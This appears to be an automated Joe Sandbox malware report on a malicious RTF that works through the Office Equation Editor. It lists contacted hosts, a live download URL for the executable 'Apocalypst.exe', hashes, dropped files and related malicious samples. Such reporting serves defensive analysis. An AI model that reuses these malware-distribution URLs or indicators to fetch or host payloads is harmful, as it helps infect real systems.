      http://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.bin0%Avira URL Cloudsafe
      http://www.certicamara.com00%Avira URL Cloudsafe
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%Avira URL Cloudsafe
      http://www.ssc.lt/cps030%URL Reputationsafe
      http://www.ssc.lt/cps030%URL Reputationsafe
      http://www.ssc.lt/cps030%URL Reputationsafe
      http://crl.oces.certifikat.dk/oces.crl00%Avira URL Cloudsafe
      http://www.ancert.com/cps00%URL Reputationsafe
      http://www.ancert.com/cps00%URL Reputationsafe
      http://www.ancert.com/cps00%URL Reputationsafe
      http://www.dnie.es/dpc00%URL Reputationsafe
      http://www.dnie.es/dpc00%URL Reputationsafe
      http://www.dnie.es/dpc00%URL Reputationsafe
      http://www.rootca.or.kr/rca/cps.html00%Avira URL Cloudsafe
      https://www.netlock.hu/docs/0%URL Reputationsafe
      https://www.netlock.hu/docs/0%URL Reputationsafe
      https://www.netlock.hu/docs/0%URL Reputationsafe
      https://aap-ef.com/W0%Avira URL Cloudsafe
      http://www.trustcenter.de/guidelines00%Avira URL Cloudsafe
      http://crl.chambersign.org/publicnotaryroot.crl00%Avira URL Cloudsafe
      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
      http://144.168.239.55/win/Apocalypst.exe0%Avira URL Cloudsafe
      http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
      http://www.firmaprofesional.com00%Avira URL Cloudsafe
      https://www.netlock.net/docs0%URL Reputationsafe
      https://www.netlock.net/docs0%URL Reputationsafe
      https://www.netlock.net/docs0%URL Reputationsafe
      http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl0%Avira URL Cloudsafe
      http://www.comsign.co.il/cps00%URL Reputationsafe
      http://www.comsign.co.il/cps00%URL Reputationsafe
      http://www.comsign.co.il/cps00%URL Reputationsafe
      http://cps.chambersign.org/cps/publicnotaryroot.html00%Avira URL Cloudsafe
      http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
      http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
      http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      aap-ef.com
      213.239.204.60
      truefalse
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.binfalse
        • Avira URL Cloud: safe
        unknown
        http://144.168.239.55/win/Apocalypst.exetrue
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.certicamara.com/certicamaraca.crl0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
          high
          http://fedir.comsign.co.il/crl/ComSignCA.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.e-me.lv/repository0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          https://aap-ef.com/-vbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.acabogacia.org/doc0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://crl.chambersign.org/chambersroot.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://cps.chambersign.org/cps/chambersroot.html0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.acabogacia.org0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.certifikat.dk/repository0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.chambersign.org1vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://repository.swisssign.com/0vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
            high
            http://crl.securetrust.com/SGCA.crl0vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://crl.ssc.lt/root-c/cacrl.crl0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.post.trust.ie/reposit/cps.html0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.certicamara.com/certicamaraca.crl0;vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
              high
              http://www.e-szigno.hu/RootCA.crt0vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
                high
                http://www.quovadisglobal.com/cps0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                  high
                  http://www.e-szigno.hu/SZSZ/0vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
                    high
                    http://www.certicamara.com0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Evbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.ssc.lt/cps03vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.oces.certifikat.dk/oces.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.ancert.com/cps0vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.2111772656.000000001ED42000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.pki.wellsfargo.com/wsprca.crl0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                      high
                      http://www.dnie.es/dpc0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.rootca.or.kr/rca/cps.html0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://rca.e-szigno.hu/ocsp0-vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
                        high
                        https://www.netlock.hu/docs/vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://aap-ef.com/Wvbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.trustcenter.de/guidelines0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.chambersign.org/publicnotaryroot.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.entrust.net/CRL/Client1.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                          high
                          http://www.e-szigno.hu/RootCA.crlvbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
                            high
                            http://crl.xrampsecurity.com/XGCA.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.ssc.lt/root-a/cacrl.crl0vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.firmaprofesional.com0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.wellsfargo.com/certpolicy0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                              high
                              https://www.netlock.net/docsvbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlvbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.comsign.co.il/cps0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://cps.chambersign.org/cps/publicnotaryroot.html0vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.e-trust.be/CPS/QNcertsvbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              144.168.239.55
                              unknownCanada
                              36352AS-COLOCROSSINGUStrue
                              213.239.204.60
                              unknownGermany
                              24940HETZNER-ASDEfalse

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:326325
                              Start date:03.12.2020
                              Start time:09:52:57
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 6m 55s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:8825358c-c9a2-4b41-9da6-2ff1c62969d9 (renamed file extension from none to rtf)
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winRTF@11/14@1/2
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 13.6% (good quality ratio 3.5%)
                              • Quality average: 14.5%
                              • Quality standard deviation: 28.3%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Active ActiveX Object
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 67.27.157.126, 8.248.117.254, 67.27.159.254, 8.253.95.121, 67.27.234.126
                              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Too many dropped files, some of them have not been restored
                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/326325/sample/8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:53:44API Interceptor162x Sleep call for process: EQNEDT32.EXE modified
                              09:53:48API Interceptor542x Sleep call for process: vbc.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              HETZNER-ASDE2020-12-03_08-45-45.exe.exeGet hashmaliciousBrowse
                              • 195.201.225.248
                              zeppelin.exeGet hashmaliciousBrowse
                              • 88.99.66.31
                              ForbiddenTear_2.exeGet hashmaliciousBrowse
                              • 95.216.167.199
                              ForbiddenTear.exeGet hashmaliciousBrowse
                              • 95.216.167.199
                              Shipment Document BL,INV and packing list.jpg.exeGet hashmaliciousBrowse
                              • 136.243.5.200
                              https://icsheadstart-my.sharepoint.com/:b:/g/personal/agreer_ics-hs_org/Efrk8FYTb6pNqHO8jgX4qqcB1ibAW9ZmUWYUGIEnXM4YxA?e=4%3a8jNJwB&at=9Get hashmaliciousBrowse
                              • 95.217.48.81
                              http://23.129.64.206Get hashmaliciousBrowse
                              • 116.202.120.165
                              https://www.paperturn-view.com/?pid=MTI128610Get hashmaliciousBrowse
                              • 148.251.96.155
                              q9y42trS7z.exeGet hashmaliciousBrowse
                              • 195.201.225.248
                              ForbiddenTear.exeGet hashmaliciousBrowse
                              • 95.216.167.199
                              Hlxj8nfBay.exeGet hashmaliciousBrowse
                              • 88.99.66.31
                              N6Fv7clWxO.exeGet hashmaliciousBrowse
                              • 168.119.38.182
                              7z6cDuH7Md.exeGet hashmaliciousBrowse
                              • 88.99.66.31
                              cpMHTTwNC1.exeGet hashmaliciousBrowse
                              • 88.99.66.31
                              PO8433L.exeGet hashmaliciousBrowse
                              • 88.198.22.168
                              PayeeAdvice_HK02022_R0977491_02178_PDF.exeGet hashmaliciousBrowse
                              • 49.12.47.176
                              IaGdBpfkmV.exeGet hashmaliciousBrowse
                              • 88.99.66.31
                              AddressValidateForm-112430163-12012020.xlsGet hashmaliciousBrowse
                              • 136.243.219.85
                              AddressValidateForm-112430163-12012020.xlsGet hashmaliciousBrowse
                              • 136.243.219.85
                              http://www.8689christine.johnson.ketabebourse.com/?VGH=Y2hyaXN0aW5lLmpvaG5zb25Ab2Nzc2VydmljZXMuY29t&data=04|01|christine.johnson@ocsservices.com|ddf4e3b17f6248d1dc6908d895b7e874|a376937a74b041c598e16157ec71fafc|0|0|637423964394781731|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|1000&sdata=KfvutEfVt7ksS/9DwJPl3bv+x3vhTR1TFV12wMF4G+M=&reserved=0Get hashmaliciousBrowse
                              • 138.201.54.59
                              AS-COLOCROSSINGUSF9g721I4sS.rtfGet hashmaliciousBrowse
                              • 192.227.129.19
                              OaqNzuH6LG.rtfGet hashmaliciousBrowse
                              • 216.170.114.70
                              keksec.x86Get hashmaliciousBrowse
                              • 198.144.190.5
                              https://mbtaroll.tk/Login.php?sslchannel=true&sessionid=Jpvx93y8JgRFpwB2D6S76FwVGVH0eKmArD2DZdvffGrHIfGfryVp0vtNmvQdBq2eIn8T1temjHcqnoXVK9jYs24fgzW8Poywqnsx1f3VYySbZPlY2BXshxKsAiqv4FaDCoGet hashmaliciousBrowse
                              • 23.95.217.2
                              r.dllGet hashmaliciousBrowse
                              • 192.227.170.162
                              PI.xlsxGet hashmaliciousBrowse
                              • 107.173.191.10
                              New Order.xlsxGet hashmaliciousBrowse
                              • 198.23.212.224
                              POQQTYG.xlsxGet hashmaliciousBrowse
                              • 198.23.212.224
                              Payment _ Advice.xlsxGet hashmaliciousBrowse
                              • 198.23.212.166
                              Shipping Documents.xlsxGet hashmaliciousBrowse
                              • 192.3.152.163
                              Purchase Order 1508521.xlsxGet hashmaliciousBrowse
                              • 216.170.114.70
                              Purchase Order 1508521.xlsxGet hashmaliciousBrowse
                              • 216.170.114.70
                              PO. NO. 20201240001.xlsxGet hashmaliciousBrowse
                              • 198.23.212.224
                              b46rhYLlgB.exeGet hashmaliciousBrowse
                              • 198.23.213.114
                              PI-08351.xlsxGet hashmaliciousBrowse
                              • 198.23.212.166
                              AWB INVOICE.xlsxGet hashmaliciousBrowse
                              • 216.170.126.121
                              TT receipt.xlsxGet hashmaliciousBrowse
                              • 216.170.114.70
                              https://mbtaroll.tk/Login.php?sslchannel=true&sessionid=Jpvx93y8JgRFpwB2D6S76FwVGVH0eKmArD2DZdvffGrHIfGfryVp0vtNmvQdBq2eIn8T1temjHcqnoXVK9jYs24fgzW8Poywqnsx1f3VYySbZPlY2BXshxKsAiqv4FaDCoGet hashmaliciousBrowse
                              • 23.95.217.2
                              ORDER LIST.xlsxGet hashmaliciousBrowse
                              • 198.23.212.224
                              Order Specification.xlsxGet hashmaliciousBrowse
                              • 198.23.212.166

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              7dcce5b76c8b17472d024758970a406bReports BD07ZFERA.docGet hashmaliciousBrowse
                              • 213.239.204.60
                              Payment list.xlsxGet hashmaliciousBrowse
                              • 213.239.204.60
                              proforma invoice of 45% TT.xlsxGet hashmaliciousBrowse
                              • 213.239.204.60
                              TNT Makbuzu.xlsxGet hashmaliciousBrowse
                              • 213.239.204.60
                              document-837747519.xlsGet hashmaliciousBrowse
                              • 213.239.204.60
                              Receipt__n3117_12022020.xlsGet hashmaliciousBrowse
                              • 213.239.204.60
                              UqjZpY9ltr.docGet hashmaliciousBrowse
                              • 213.239.204.60
                              UqjZpY9ltr.docGet hashmaliciousBrowse
                              • 213.239.204.60
                              part1.rtfGet hashmaliciousBrowse
                              • 213.239.204.60
                              350222_original.xlsmGet hashmaliciousBrowse
                              • 213.239.204.60
                              350222_original.xlsmGet hashmaliciousBrowse
                              • 213.239.204.60
                              566130_original.xlsmGet hashmaliciousBrowse
                              • 213.239.204.60
                              ACH & WIRE PAYMENT.xlsxGet hashmaliciousBrowse
                              • 213.239.204.60
                              inv_940214_12022020.xlsmGet hashmaliciousBrowse
                              • 213.239.204.60
                              Misc supplies.xlsxGet hashmaliciousBrowse
                              • 213.239.204.60
                              Factura de proforma.xlsxGet hashmaliciousBrowse
                              • 213.239.204.60
                              TNT Receipt.xlsxGet hashmaliciousBrowse
                              • 213.239.204.60
                              B3CcRRb6nV.docGet hashmaliciousBrowse
                              • 213.239.204.60
                              Detailed__07BTV.docGet hashmaliciousBrowse
                              • 213.239.204.60
                              Detailed__07BTV.docGet hashmaliciousBrowse
                              • 213.239.204.60

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                              Process:C:\Users\Public\vbc.exe
                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                              Category:dropped
                              Size (bytes):58936
                              Entropy (8bit):7.994797855729196
                              Encrypted:true
                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                              MD5:E4F1E21910443409E81E5B55DC8DE774
                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                              Process:C:\Users\Public\vbc.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):326
                              Entropy (8bit):3.123186963792904
                              Encrypted:false
                              SSDEEP:6:kKReSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:EdkPlE99SNxAhUegeT2
                              MD5:CA140BC2D2341CEB482D491DFB5B3E9A
                              SHA1:198DF12C626223855993F1C4DC871E3EE34D0815
                              SHA-256:504FA3575CB451CB4388F5B22F04257CD7D8E127F97518E2D54BF421F5065FE4
                              SHA-512:A3F167FB34D9ABB7D0163754A8935F9FF173D1812E86F4E921A191E7A836BAF3DB3FC4F5D40E5638AF212CB58AF588B8FA94368A67303FD89075A48B8BCE9B3B
                              Malicious:false
                              Reputation:low
                              Preview: p...... ...........B....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:downloaded
                              Size (bytes):57344
                              Entropy (8bit):4.885327146725006
                              Encrypted:false
                              SSDEEP:768:slMzNO4SKo/DI4CmCYFbze9YYgP9fSDpoDRF0aWzJUNYC7LDnD:ZsIRm1xYgP9gpoDRF0aWzpwnD
                              MD5:36A1FE92A6D16E8B6EF766C06B7D9300
                              SHA1:B929411D87973BDB1EAE867036488527C06A5EAF
                              SHA-256:F58FBC11BBF63FA27F08450AEBED92C1A7B48BB0B4A2140453A0D6A14A7CA67F
                              SHA-512:B77F83EE7A0DDDF192177C5AAACB8E383FC5C34C116C39CCA411E9915E3D5DB4E38407EBD7176180C864987AE84968B271C1FA204FE28584CD0FABDDDE58C98D
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:low
                              IE Cache URL:http://144.168.239.55/win/Apocalypst.exe
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....cO..................... ....................@..................................J..........................................(.......4...................................................................(... ....................................text............................... ..`.data...P...........................@....rsrc...4...........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BAD8F7-5649-4CA3-B477-D1894D362AA0}.tmp
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1024
                              Entropy (8bit):0.05390218305374581
                              Encrypted:false
                              SSDEEP:3:ol3lYdn:4Wn
                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CA77BE0D-EA94-48C8-B11C-A4D4E3B47DD5}.tmp
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):9728
                              Entropy (8bit):3.512122173476268
                              Encrypted:false
                              SSDEEP:192:0DEkiz6HlPqzJ5JezZwjaznWuc/zgkvYJQO+Ihl4L6UGgVp:0DETulPqzJ5JezauzBc/3vY6QT26UGEp
                              MD5:6EE5372BBC2DE1A8377A0EAB70DB20DA
                              SHA1:54900B428360F7B6401FD4C0F2EFCEBC18726F9B
                              SHA-256:704D1DF471C065E547878A104CDC44A53923D6F52249989B9C1F308B732B2FBF
                              SHA-512:BE54A2F64D747ACD63D6D6469786CE1A87CFCE01F0297FC4FDFF1ECAF41E1728F4D22BEABF555D048E732EA536ABF3761B70A597322C896E1F65B4DBC9156B71
                              Malicious:false
                              Reputation:low
